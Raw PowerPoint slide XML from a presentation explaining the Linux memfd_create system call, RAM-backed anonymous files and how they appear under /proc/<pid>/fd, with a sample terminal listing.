            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3649401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1" y="2708920"/>
            <a:ext cx="8568952" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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rPr>
              <a:t>memfd_create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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>creates an anonymous file and returns a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file descriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that refers to it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>However, unlike a regular file, it lives in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>RAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and has a volatile backing storage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Once all references to the file are dropped, it is automatically released. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Files Created by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memfd_create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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1595204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732381" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The name supplied in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is used as a filename and will be displayed as the target of the corresponding symbolic link in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/self/</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fd</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The displayed name is always prefixed with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memfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and serves only for debugging purposes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1431713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5496" y="2675467"/>
            <a:ext cx="9001000" cy="3574696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>total 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 64 Mar 30 23:23 0 -&gt; /dev/pts/0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 64 Mar 30 23:23 1 -&gt; /dev/pts/0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 64 Mar 30 23:23 2 -&gt; /dev/pts/0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 64 Mar 30 23:23 3 -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd:kittens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (deleted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 64 Mar 30 23:23 4 -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: (deleted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>這個目錄包含了進程打開的每一個文件的鏈接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itread01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>Here we see two anonymous files, one named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kittens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> and one without a name at all. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(deleted)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>is inaccurate and looks a bit weird but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" err="1"/>
              <a:t>c’est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> la vie.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2200"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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Anonymous File (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/&lt;PID&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
